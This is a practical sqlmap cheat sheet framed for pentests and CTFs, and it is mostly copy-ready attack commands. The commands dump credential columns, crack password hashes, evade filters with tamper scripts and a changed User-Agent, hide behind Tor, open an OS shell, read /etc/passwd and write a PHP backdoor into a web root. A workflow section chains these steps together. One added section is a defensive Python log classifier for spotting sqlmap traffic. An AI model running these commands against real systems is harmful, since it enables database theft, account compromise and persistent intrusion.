SQLMAP — Practical Guide

1. INTRODUCTION

sqlmap is an automated SQL injection detection and exploitation tool.

It can:

Detect SQL injection

Enumerate databases, tables, users

Dump credentials

Read/write files

Gain OS command execution

Supports MySQL, MSSQL, PostgreSQL, Oracle, SQLite, MariaDB, Firebird, and more.


2. BASIC DETECTION

Test a GET parameter:

bash
sqlmap -u "http://target.com/product?id=1"

Verbose output:

bash
sqlmap -u "http://target.com/item?id=1" -v 3

3. SPECIFYING PARAMETERS

GET request:

bash
sqlmap -u "http://site.com/p?id=1"

POST request:

bash
sqlmap -u "http://site.com/login" --data="user=admin&pass=123"

Cookie injection:

bash
sqlmap -u "http://site.com/" --cookie="PHPSESSID=abc123"

4. LEVEL AND RISK

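Higher values run more, and more aggressive, tests: --level widens the set of payloads and injection points tried, --risk allows payloads that are more likely to disturb the target. Both default to 1.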

Risk: 1–3

Level: 1–5

Example:

bash
sqlmap -u URL --risk=3 --level=5

5. ENUMERATING DATABASES

List DBMS databases:

bash
sqlmap -u URL --dbs

List tables:

bash
sqlmap -u URL -D dbname --tables

List columns:

bash
sqlmap -u URL -D dbname -T table --columns

6. DUMPING DATA

Dump entire table:

bash
sqlmap -u URL -D db -T table --dump

Dump specific columns:

bash
sqlmap -u URL -D db -T table -C username,password --dump

7. BYPASSING PROTECTIONS

Change User-Agent:

bash
sqlmap -u URL --user-agent="Mozilla/5.0"

Use tamper scripts:

bash
sqlmap -u URL --tamper=space2comment

Multiple tampers:

bash
sqlmap -u URL --tamper=space2comment,between
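
Seen from the defender's side, the log check below is an added example, not part of the original guide or of sqlmap. It shows that a changed User-Agent removes only the User-Agent signal, while rules run on the URL-decoded, comment-stripped query still match requests rewritten by space2comment and between. The log lines, rule names and the `sqlmap/1.0` version string are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2025:10:00:00 +0000] "GET /product?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jan/2025:10:00:01 +0000] "GET /product?id=1%20AND%207=7 HTTP/1.1" 200 512 "-" "sqlmap/1.0 (https://sqlmap.org)"',
    '198.51.100.9 - - [01/Jan/2025:10:00:02 +0000] "GET /product?id=1/**/UNION/**/ALL/**/SELECT/**/NULL HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jan/2025:10:00:03 +0000] "GET /product?id=1%20AND%207%20BETWEEN%207%20AND%207 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# Request target and User-Agent from one combined-format line.
REQUEST = re.compile(r'"(?:\S+) (?P<target>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Payload rules run on the normalized query, so comment padding cannot split keywords.
PAYLOAD_RULES = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "boolean-test": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+"),
    "between-rewrite": re.compile(r"\b(?:and|or)\s+\d+\s+(?:not\s+)?between\s+\d+\s+and\s+\d+"),
}

def normalize(query: str) -> str:
    """URL-decode, turn inline /* */ comments into spaces, collapse whitespace, lowercase."""
    text = unquote_plus(query)
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text).lower()

def classify(line: str) -> list[str]:
    """Return the sorted names of the rules that fire for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    hits = set()
    if m["ua"].lower().startswith("sqlmap/"):
        hits.add("default-user-agent")  # only present when the User-Agent was not changed
    query = m["target"].partition("?")[2]
    if "/**/" in unquote_plus(query):
        hits.add("comment-as-space")    # empty comments used in place of spaces
    norm = normalize(query)
    hits.update(name for name, rx in PAYLOAD_RULES.items() if rx.search(norm))
    return sorted(hits)

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry), entry.split('"')[1])
```
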

8. USING TOR

Route all traffic through Tor:

bash
sqlmap -u URL --tor --tor-type=socks5 --check-tor

9. OS SHELL & FILE OPERATIONS

Interactive OS shell:

bash
sqlmap -u URL --os-shell

Upload file:

bash
sqlmap -u URL --file-write=backdoor.php --file-dest=/var/www/html/backdoor.php

Read file:

bash
sqlmap -u URL --file-read=/etc/passwd

10. ENUMERATING USERS & PRIVILEGES

Enumerate users:

bash
sqlmap -u URL --users

Enumerate passwords:

bash
sqlmap -u URL --passwords

Enumerate privileges:

bash
sqlmap -u URL --privileges

11. BRUTE-FORCING PASSWORDS

Crack hashes:

bash
sqlmap -u URL --passwords --batch

Common table-based cracking:

bash
sqlmap -u URL --passwords --common-tables

12. CRAWLING & AUTOMATION

Automatically crawl website for URLs:

bash
sqlmap -u "http://target.com" --crawl=3

13. USING PROXY

Send traffic through Burp Suite:

bash
sqlmap -u URL --proxy=http://127.0.0.1:8080

14. REAL PENTEST WORKFLOW


1. Detect SQL injection:

bash
sqlmap -u URL

2. Get DB/user info:

bash
sqlmap -u URL --current-db --current-user --dbs

3. Enumerate tables:

bash
sqlmap -u URL -D targetdb --tables

4. Dump credentials:

bash
sqlmap -u URL -D targetdb -T users -C user,hash --dump

5. Crack hashes:

Use hashcat or john


6. Try OS shell:

bash
sqlmap -u URL --os-shell

15. CTF TIPS

Use --batch to skip prompts.

Always try tamper scripts.

Use --dump-all when needed.

Scan multiple parameters by parsing and testing the page's forms:

bash
sqlmap -u URL --forms
